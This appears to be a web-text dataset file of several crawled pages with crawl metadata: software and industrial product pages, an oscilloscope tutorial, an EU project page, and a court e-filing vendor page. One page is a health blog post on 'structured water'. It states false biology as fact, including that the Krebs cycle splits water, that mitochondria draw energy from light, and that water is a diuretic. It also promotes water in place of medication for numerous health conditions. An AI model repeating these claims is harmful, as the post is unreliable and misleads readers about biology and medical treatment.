Is GRObase compliant? GRObase is a robust web based software solution that is specifically designed to handle the day-to-day workflow of Licensed Producers, while ensuring compliance under Health Canada’s Marihuana for Medical Purposes Regulations (MMPR). With failsafe protocols implemented into the core design, it ensures data is always properly recorded and stored within the system allowing Health Canada audits to be fulfilled with ease. The database system has a number of customizable features, ensuring that Licensed Producers get the most out of their GRObase. - Database allows for inclusive record keeping while fulfilling your core MMPR requirements. - Fail-safe protocols implemented to ensure that all information is recorded in an accurate manner. - Employee audit tracking when entering or changing data to properly identify who performed each task. - Digitally stored documents on the database for easy access and to assist with Health Canada audits. - Traceback tactics of each product’s origin are instilled to ensure that proper record keeping is performed. - In vitro testing logs to ensure that quality assurance testing is carried out and recorded successfully. "It's your record keeping backbone." Pre-register for GRObase GRObase is scheduled for release Spring 2014. Pre-register now if you would like to receive development updates and
systems_science
http://www.m4u.com.au/CRM-integrated-sol.html
2013-05-25T12:19:10
s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368705948348/warc/CC-MAIN-20130516120548-00030-ip-10-60-113-184.ec2.internal.warc.gz
0.860816
188
CC-MAIN-2013-20
webtext-fineweb__CC-MAIN-2013-20__0__36990036
en
Click here to see our new API page INTEGRATED SMS SOLUTIONS With Message4U's advanced SMS gateway technology and SMS API, the convenience and effectiveness of SMS software can be built in to your organisation's existing CRM systems. Empowering a CRM system with wireless communication technology can enable it to send PC-to-SMS messages to customers, and to receive replies directly to your application's interface. For example, integrating SMS solutions with appointment booking software can enable an application to send scheduled reminder notices to customers. Alternatively, SMS can be integrated into an inventory system so that customers can be immediately notified when an ordered item becomes available. Sales and account management staff can also benefit from integrated SMS solutions with point of sale systems and CRM applications. For more information about our integrated SMS services, phone 1800 009 767 or contact Message4U for detailed information in PDF format.
systems_science
https://articles.saleae.com/oscilloscopes/digital-oscilloscopes
2023-11-29T18:47:16
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100135.11/warc/CC-MAIN-20231129173017-20231129203017-00212.warc.gz
0.903916
1,361
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__4636232
en
Comment on page This tutorial will explain some features that are slightly more advanced and may be available only on digital oscilloscopes (more properly known as digital storage oscilloscopes, or DSOs). Our two previous tutorials have described basic concepts and setup procedures, which will help build a solid foundation for the lessons in this tutorial. Most oscilloscopes today are digital, meaning that they take rapid samples of an analog voltage and digitize the samples for manipulation and storage. This processing is done internally in benchtop and handheld oscilloscopes, while a USB oscilloscope typically offloads the task to a desktop or laptop computer. The conversion of voltage samples into numbers that can be stored in memory is done by an analog-digital converter (ADC). This is comparable to the process of digitizing music for an MP3 file or a compact disc. A typical moderately priced digital oscilloscope will use 8 bits (binary digits) to store 256 possible voltage values within the range selected by the user. Precision oscilloscopes may use 12 bits (4,096 values) or 16 bits (65,536 values) to store each voltage sample. The speed of converting and storing samples will be limited by processing power. A digital oscilloscope may allow you to set the frequency and bit depth manually, but if the processor is unable to reach the frequency requested by the user, it may draw straight lines between points on the screen or may link them with little curves calculated with a trigonometry function. This process of inferring missing data is known as interpolation. Figure 1 shows straight-line interpolation, beginning with an analog signal at the top, a rapidly sampled digital version with 20 voltage levels in the middle, and a slowly sampled version with only 5 voltage levels at the bottom. Figure 1: Straight-line interpolation Sampling rate is measured as MS/s (megasamples per second) or GS/s (gigasamples per second). The peak sampling rate quoted by a manufacturer may be attainable only when a single channel is in use; a second channel will almost double the processing requirements, and the sampling rate may diminish accordingly. Ideally the sampling rate of a digital oscilloscope should be about 10 times the highest signal frequency that you will be measuring. The most common type of oscilloscope probe has a little slide switch on its body, as shown in Figure 2. 1X is the normal position. The 10X position engages a resistor-capacitor combination inside the body of the probe which attenuates the measured voltage by a factor of 10. This allows you to measure voltages that are up to 10 times the usual limit for the oscilloscope. The higher resistance of a probe in its 10X setting also imposes less load on the circuit that you are testing, but you will lose accuracy at low voltages. Figure 2: 1X and 10X probe attenuation switch The default for most oscilloscopes is 10X attenuation, as it offers a balance of bandwidth and amplitude. 1X should be reserved for signals with low frequency and low voltages. Additionally, your oscilloscope may have a setting that allows you to specify probes with different characteristics, such as 100X for dealing with very high voltages. Almost all oscilloscopes have at least two channels, each of which can display a signal from a separate probe. This enables you to compare signals from more than one source. For example, suppose you have two 7555 timer chips wired in astable mode, and one of them modulates the signal from the other. This can be done by taking the fluctuating voltage on the Threshold pin of the first chip and connecting it with the Control pin of the second chip. In Figure 3, the control voltage from the first chip is the blue triangular waveform while the square wave from the output of the second chip is red. You can see that when the control voltage increases, the frequency of the square wave decreases. Figure 3: The control voltage and output signal of a 7555 timer The two traces may also be displayed in a split screen, as in Figure 4. The VOLTS/DIV of each view can be adjusted separately, so that each trace fills its window. Figure 4: The control voltage and output voltage displayed on a split screen On a digital oscilloscope, the basic triggering capability that I described in "How to Use An Oscilloscope" (link above this article) will have additional variations. A simple edge trigger tells the oscilloscope to start capturing data either when the voltage rises up through a trigger threshold or drops down through it. A digital oscilloscope can be set to respond if either of these events occurs. Pulse-width triggering detects pulses that are either longer or shorter than specified. This is useful for sensing momentary timing inaccuracies in a repeating signal. A window trigger detects voltage entering or leaving a window that may be defined visually on the screen. Hysteresis can be specified to eliminate false positives caused by a noisy signal. This setting basically tells the oscilloscope, "When voltage rises through a lower threshold, wait until the voltage continues to rise through a higher threshold." In the hysteresis zone between these levels, the oscilloscope ignores small variations. If the voltage drops back below the lower threshold without ever reaching the higher threshold, the triggering operation is cancelled until the next rise through the lower threshold occurs. A hysteresis setting can also be used to sense a falling voltage that drops through a higher threshold followed by a lower threshold. You may also set pre-trigger time or post-trigger delay to determine the moment when the signal will be displayed before or after the triggering event. All of these trigger options may help to detect events such as voltage spikes that are brief, intermittent, and difficult to see. Any digital oscilloscope should be able to derive immediate numeric measurements from a trace or a segment of a trace. These measurements will include the frequency of a signal, its minimum and maximum voltage, its average voltage, and its RMS value. RMS is an acronym for root-mean-square, and is calculated by squaring each of a series of regularly spaced voltage measurements, finding the average of the squares, and then extracting the square root of the average. The result is equivalent in power to a DC voltage of the same value; thus 110V DC should cause an incandescent bulb to burn as brightly as 110V AC RMS, even though the AC signal will have higher peak values. Other features may be available in oscilloscopes, but they are less commonly used or more technical than the ones listed here.
systems_science
http://www.eeca-ict.eu/working_groups/&day=13&month=5&year=2012
2013-12-10T21:29:53
s3://commoncrawl/crawl-data/CC-MAIN-2013-48/segments/1386164026161/warc/CC-MAIN-20131204133346-00007-ip-10-33-133-15.ec2.internal.warc.gz
0.922552
280
CC-MAIN-2013-48
webtext-fineweb__CC-MAIN-2013-48__0__24968896
en
People and interaction between them are the key factors for scientific research, technological development and industrial applications progress. In order to strengthen the opportunities for interaction, the PICTURE team created three interconnected Working Groups. The objective of the Thematic Working Groups is to provide the project with strategic vision regarding the EU-EECA ICT collaboration in specific application and research domains, whilst connecting the project to the key relevant players both in Europe and in the EECA countries. The WGs will be open and will interact with each other, in order to benefit from mutual learning and exchange of experience. PICTURE project has created three thematic Working Groups: - Working Group on Policy Dialogue (WG1): WG1 deals with different policy related topics. - Working Group on Components, computing systems, and networks (WG2): WG2 covers the fields of a new generation of components and systems, advanced computing, software and services for the future internet. - Working Group on Content technologies and information management (WG3): WG3 deals with the areas of digital libraries; technology enhanced learning, intelligent information management, ICT for digital learning and creativity. The topics of the Working Groups were chosen according to the outcomes of previous relevant projects and to a voting procedure between PICTURE partners. Follow the links to find more information about the members of PICTURE Working Groups:
systems_science
https://www.kochseparation.com/markets/oil-gas/
2023-06-09T15:22:47
s3://commoncrawl/crawl-data/CC-MAIN-2023-23/segments/1685224656737.96/warc/CC-MAIN-20230609132648-20230609162648-00751.warc.gz
0.918431
297
CC-MAIN-2023-23
webtext-fineweb__CC-MAIN-2023-23__0__286381462
en
Oil & gas refineries and plants face a variety of obstacles in creating an efficient and cost-effective operation. KSS offers solutions to minimize contaminants and promote resource recovery to drive down operating costs and prolong equipment lifetime. Our amine purification solution effectively removes heat stable salts (HSS) for improved absorber performance, reduced equipment corrosion, and fewer amine purchases. The AmiPur® system features Recoflo® ion exchange technology to continuously remove HSS from the amine circuit, recycling purified amine back into the process. Heat Stable Salt Removal in Carbon Capture and Storage The AmiPur®-CCS system features Recoflo® ion exchange technology to continuously remove HSS from amine circuits in the removal/recovery of CO2 from gases, recycling purified amine back into the process. The oil & gas industry relies heavily on high-quality process water throughout its operations. Our pretreatment solutions include filtration and water softening of feed streams to steam generators and boilers to reduce oil and suspended solids content, providing significant improvements to downstream processes. Filtration & Softening Our products and systems reduce operating costs through efficient media or membrane filtration of process water and water softening to reduce salts, oils, and suspended solids.
systems_science
https://www.multiflora-herbs.com/blogs/news/water
2023-12-08T17:11:11
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100762.64/warc/CC-MAIN-20231208144732-20231208174732-00186.warc.gz
0.947861
2,866
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__44092238
en
Water: the liquid of life Water is by far one of the most unique substances in existence. It is one of the only known compounds that is denser as a liquid than as a solid, essentially because it's a liquid crystal. Let me explain what I mean by this. Water is composed of two hydrogen atoms combined with an oxygen atom, like this H-O-H, with the bond forming an angle a little over 90 degrees. Oxygen has a much larger electron cloud than hydrogen, as hydrogen is actually the smallest element. Because of this, oxygen tends to pull the molecule's electrons closer to itself, basically creating a charge imbalance. This makes water a molecular dipole, with the oxygen being the negatively charged end, and the two hydrogen atoms being positively charged. We've all heard that like charges repel and opposites attract, well the same rule applies for polar molecules. The weak ionic bonds that form between water molecules are known as “hydrogen bonds.” On a large scale, the geometric organization based on water's polarity and bond geometry is known as the “hydrogen bond network.” This is what makes water a liquid crystal. At high temperatures the hydrogen bonds are broken and water forms a gas, but at low temperatures water becomes either a liquid or solid crystal. The geometry in ice crystals is based on the tetrahedral pyramid structure of low energy hydrogen bonds. The hydrogen bond network gives water an even more interesting property, a fourth phase between solid and liquid. This is known as “structured water,” or exclusion zone (EZ) water, and is essentially a more crystalline gel state of water. EZ water is created when water interacts with particular chemical materials (anything hydrophilic) or electromagnetic frequencies (specifically infrared light). In this phase, water molecules form a more solidified hydrogen bond connection, and its positive and negative poles are oriented so that all positively charged atoms are facing one direction and all negatively charged atoms are facing the other. Because like charges repel, this pushes anything positively charged out of this phase of water, and pools negative charge within it. This is where the name “exclusion zone” comes from. I recommend reading Gerald Pollock's book The Fourth Phase of Water for more in depth info, or watch a his TED Talk on it here. Structured water plays a pivotal role in cellular and mitochondrial function. Cell walls are very hydrophilic, as are protein structures. This gives cells the ability to structure water in and around them, and many structures in life seem to have evolved specifically for this purpose. As an example let's look at mitochondria. Mitochondria ideally produce most of their energy through a process called oxidative phosphorylation, which primarily requires a current of electrons running across the electron transport chain, and a stream of protons flowing through a proton pump. Mitochondria actually hold far more structured water than any other part of the cell, and they use it as a way to store electrons to keep the electron transport chain running, creating a gel-state water battery. If we look at how mitochondria are structured, they are completely filled with inter-folded cell walls known as cristae. The cristae serve to maximize the amount of hydrophilic surface area touching the water inside mitochondria. This creates a huge increase in water structuring. I hope now you're starting to see why I find mitochondria the most fascinating component of life! A cellular biologist named Gilbert Ling devised an early theory similar to what we know as water structuring today. Interestingly, he did so to explain how cells are able to balance sodium and potassium. Sodium and potassium work together to maintain water balance inside cells. With too much sodium present the cell will fill with water, with more potassium than sodium the opposite occurs. Through natural osmosis the cell's sodium/water concentration becomes too high for normal cell functions to occur, including proper water structuring. In fact, one of the defining features of cancer cells is that their water balance rises up to 90% water! To prevent this, healthy cells use an ATP dependent enzyme known as the sodium-potassium pump, which pushes sodium out in exchange for potassium going in. Now we've elicited the structure of this pump and we know it is used for this purpose, but Ling pointed out a problem, theoretically the cell isn't able to produce enough energy to maintain this enzyme. In fact, based on standard biology the body can produce only about 1/3,000th of the ATP it needs to run this enzyme alone. Ling ran a number of experiments confirming this which you can read about here. The theory that he devised to answer this problem was based around water. While Ling's theory isn't perfect, it does offer many insights into the role of water in cellular energy and electrolyte balance. He created what he called the “association-induction hypothesis,” the earliest approximation of what we now know as water structuring. Ling believed that the main function of ATP wasn't to store energy at all, but to carry out its other lesser-known role, protein phosphorylation. ATP basically acts as a phosphate donor, and is used as a cofactor for a class of enzymes called kinases that modify protein structures. ATP unfolds proteins and as a result of this exposes the polar -NH and -CO groups at the ends of amino acids in the protein chains. These groups are hydrophilic and attract and orient water. We know this to be true today based on Pollack's research, but Ling predicted this decades ago! Looking at his and Pollack's work, I'm inclined to agree with Ling that perhaps ATP isn't the main “energy store” in the cell, perhaps instead it serves as a cofactor for water structuring. We know that EZ water acts as an electron sink, pooling electrons which then runs through the electron transport chain to produce more ATP. Certainly, some of this ATP is broken apart to be used for energy, and some is used to alter protein structures, but what about the remaining energy needed to run the cell? If we look for other primary sources of cellular energy besides calories from food, there are a number of good candidates. One that I've been studying in depth myself is light. Now there are two sides to this: The first relies on what's called “charge separation.” When sunlight hits water it raises it's energy state making it easier for the Krebs cycle to split water molecules into hydrogen and oxygen. This is actually the fundamental chemical reaction that allows plants to use sunlight during photosynthesis. The genius of mitochondria is that they invert this system. When sunlight hits water, through Einstein's photoelectric effect the light excites electrons while splitting water. The mitochondria uses light as the external energy source. This creates a system that can regenerate its own energy stores indefinitely. The infrared part of the sunlight spectrum contributes to the mitochondria's energy efficiency by creating more structured water. The infrared light can actually penetrate up to about 9 inches below the skin, so water structuring is enhanced in just about every cell in the body. This may be what gives the body enough ATP and EZ water to sustain its high energy requirement through the day. The other way the cell uses light is a bit more complex. It's something I've been studying more recently, but I'll explain what I've learned so far as best I can. When we look at a living system like a cell or mitochondria, the system is designed to do two things. First it liberates stored energy from food, and second it captures light energy from the environment. The stored energy comes from breaking apart molecules that other organisms (plants/animals) have created to contain energy, like fats or sugars. This is what most people think of when they think about where their body gets energy. These compounds act as electron stores and proton stores. These particles are separated out by glycolysis, beta-oxidation, and the Krebs cycle. Light energy is captured through the mechanism I mentioned previously where light breaks apart protons, electrons, and oxygen. Electrons are run through the electron transport chain, which pushes free protons out. The protons flow either flow back in through the proton pump creating ATP, or are recycled back into water by the enzyme cytochrome C oxidase. In an ideal system, any energy used could be conserved and recycled. If this process was perfected the cell would need no external input whatsoever. Mitochondria use specific interactions between water and protein structures to minimize energy loss. One example of this is the protein nanotubes that compose the cellular architecture. In his research Pollack actually found that these nanotubes possess the ability to structure water. In the cell they absorb and channel light, and turn structured water into a proton and electron superconductor. They are made up primarily of semiconductors like collagen, and seem to serve as “wires” with the ability to transmit energy throughout the cell. This allows cells to synchronize reactions across a distance and create resonance between neighboring cells (read more here). Heat put off as infrared light by the mitochondria is used to maintain body temperature, but also has other roles as well. Infrared light not only structures water, which provides numerous benefits I've already covered, but also increases the temperature of water in and around the mitochondria which actually causes to structure more tightly. When it "shrinks" like this, it pulls the protein complexes in the electron transport chain closer together preventing mitochondrial heteroplasmy (an aging-related process). Infrared light also stimulates various enzymes in the mitochondria, including cytochrome C oxidase. I've spent a lot of this article going over how water helps store and distribute energy throughout the cell and mitochondria, but there's another aspect of cellular water I want to cover before I wrap things up. This last part involves a hydrogen isotope known as deuterium. Hydrogen is the smallest atom, normally only consisting of one proton and one electron. However, there is another less common version of hydrogen with a different composition known as deuterium. Deuterium contains one proton, one electron, and one neutron. Since electrons weigh next to nothing this makes deuterium about double the weight of normal hydrogen. Even though deuterium is only present in small quantity compared to regular hydrogen, this difference in density gives it quite a large impact on how mitochondria function. As I mentioned earlier the hydrogen atoms in water (and sugars and fats) are broken apart to form individual protons and electrons which are used in to produce energy. When deuterium is present in place of hydrogen in water or other molecules you can end up with a proton and neutron bound together where a single proton should be. When this happens the heavier deuterium “proton” will dramatically slow the function of the electron transport chain or the proton pump, crashing oxidative phosphorylation. This happens due to something called the kinetic isotope effect. Many enzymes, including those in the electron transport chain, work by enhancing a process called proton tunneling, where protons have a probability of jumping from one place to another with little to no energy requirement. Deuterium blocks electron transport chain function because it has little to no ability to tunnel. All water contains deuterium to varying degrees. Sugars like glucose also contain deuterium and can be even more damaging, acting as a Trojan horse for deuterium to make its way into the mitochondria. Most people think the Krebs cycle is used to make extra ATP, few realize it actually serves a far more interesting purpose, it filters deuterium out of glucose and produces deuterium-depleted water. It does this by taking a glucose byproduct (pyruvate), and switching out all its hydrogen atoms by swapping them with those in other molecules. It does this to filter out deuterium. In the process it also collects protons for use in oxidative phosphorylation, produces ATP, and funnels electrons into the electron transport chain. The protons it gathers are later converted back into water by cytochrome C oxidase, and the cycle continues. Defects in the Krebs cycle are linked strongly to cancer. This may actually be a result of impaired deuterium filtering crashing mitochondrial function. Defects in the water recycling enzymes in the cycle (like fumarate hydratase) are associated with faster cancer metastasis and higher mortality. There have been a number of promising studies so far showing that deuterium-depleted water may help reverse tumor growth, though robust human research is still pending. Interestingly grains, carbs, and processed foods are high in deuterium while fats are fairly low. Many of the benefits of diets like keto, or low-carb, may actually be a result of reduced deuterium intake. I hope this has given you a taste for the incredible role that water plays in the human body. Without water, life itself would not exist. One question I get a lot is, how much water should someone drink each day? The answer depends on the individual, so I recommend using a calculator like this one. I also recommend adding minerals to your water, as studies show this can enhance its absorption. You can use a pre-made electrolyte blend, or make your own at home using magnesium, potassium and sea salt. Personally, I like to add inositol or a bit of lemon juice to taste. Dehydration is rampant in our modern environment, especially with frequent consumption of diuretics like alcohol or water, and high levels of EMF which destroys water balance in cells. This is an excellent book documenting the remission of numerous health conditions using no medication other than a surplus of water. After reading this article, I'm sure you know this is possible. Now, go see for yourself.
systems_science
https://www.olis.com/
2016-10-24T06:53:45
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988719542.42/warc/CC-MAIN-20161020183839-00504-ip-10-171-6-4.ec2.internal.warc.gz
0.92353
1,081
CC-MAIN-2016-44
webtext-fineweb__CC-MAIN-2016-44__0__251050235
en
formed in 1990, as a diversified software developer, applications services provider, and data operations center specializing in joint venture court system data and information management systems. Our focus is on electronic filing systems, court case management and document management systems, document imaging systems, subscription public access systems, and online and IVR electronic payment systems. ONE FULLY INTEGRATED SYSTEM, THAT WORKS! On-Line Information Services, Inc., has developed and successfully deployed a complete system in Alabama. Electronic filing (AlaFile™) Document imaging (AlaVault™) Online payment system (Alapay™) Subscription public access system (Alacourt.com™) This system is the first of its kind in the United States. On December 11, 2006, the State of Alabama became the first state to deploy a statewide "integrated" electronic filing system. The system, known as AlaFile™, allows voluntary electronic filing in all civil cases (including Small Claims, District and Circuit Courts, Domestic Relations and Child Support). AlaFile™ allows electronic filing and electronic service and notification and also provides full integration of electronically filed matters into the court's document management system (DMS) and into the clerks' and judges' case management system (CMS). The significant features of integration allow for the notification services and the new concept of Electronic Orders, which allow judges to create "2 click" instant orders in many cases. The AlaFile™ system was created out of financial necessity. In 2003, the Alabama court system suffered severe funding cutbacks, resulting in the layoff of approximately 1/3 of the employees of clerks' offices statewide, along with many other court staff. In late 2004, the Chief Justice of the Alabama Supreme Court, also tasked with the supervision of the state Administrative Office of Courts, recognized that technology represented the only possible hope for maintaining a functioning court system, and decreed that an e-filing system be created and deployed in 80% of all civil courts by the end of 2006. The key is to capitalize on this investment of time and money and move into the new age of court OLIS™ specializes in court technology integration. We implemented the first Integrated statewide E-filing system in the world, linking electronic filing from the lawyer' s computer, through the court' s case management system, to 2- click electronic orders generated at the Judge' s computer and automatically served upon all registered parties. The Document Management System (DMS) is the heart of E-Filing on the court side. Without a robust DMS, e-filed documents merely create an electronic "mountain" of unmanageable filings, not much better than the unmanageable "mountains" of paper you are trying to replace. OLIS™ incorporates its Imaging and Document Management System (USVault™), one of the most scalable and robust Document Imaging Systems available today. USVault™ was designed to handle one of the first statewide court imaging systems, and, after several years, sustains its growth at several million pages per month - without slowdown, and with affordable growth statistics. This was the "computerized court" of last century. The key is to capitalize on this investment of time and money and move into the new age of court technology. OLIS™ specializes in court technology integration. OLIS™ implemented the first Integrated statewide E-filing system in the world, linking electronic filing from the lawyer' s computer, through the court' s case management system, to 2- click electronic orders generated at the Judge' s computer and automatically served upon all registered parties. The system cannot work without the secure flow of money. OLIS™ includes the latest state-of-the-art Internet and Telephone IVR Payment systems handling credit ard and ACH payments. The system uses industry standard security measures. The entire system is operated in-house in its central operations center featuring redundant power systems (grid, natural gas generator, and gasoline backup generator) and redundant fiber high bandwidth Internet services (multiple provider over multiple fiber lines). This maximum control hands-on approach assures rapid payment clearing, accounting accuracy, and timely electronic transfer of funds to the court system bank accounts. Our approach is simple, yet quite unique. Users are willing to pay reasonable amounts for consistently high quality court data. OLIS™ pioneered subscription based Enhanced Public Access Systems to court records. This is how we got our start in 1990. Over the years, we have made our systems better and better. Ultimately, we developed the concept of E-Court Technology Partnerships with courts from which we were acquiring data. The realities of court funding proves that courts need assistance in creating high quality electronic court data. Unfortunately, only rarely are the courts provided with funding to implement state-of-the-art court technology. If the court forms a public/private partnership with a willing technology provider to implement state-of-the-art court technology, the implemented technology will provide an exponentially larger base of consistently high quality court data which the "partnership" can sell to willing subscribers, with the revenue paying for the system AND generating a revenue surplus! P.O. Box 8173 Mobile, AL 36693 Tel: 877-799-9898 / 251-344-3333
systems_science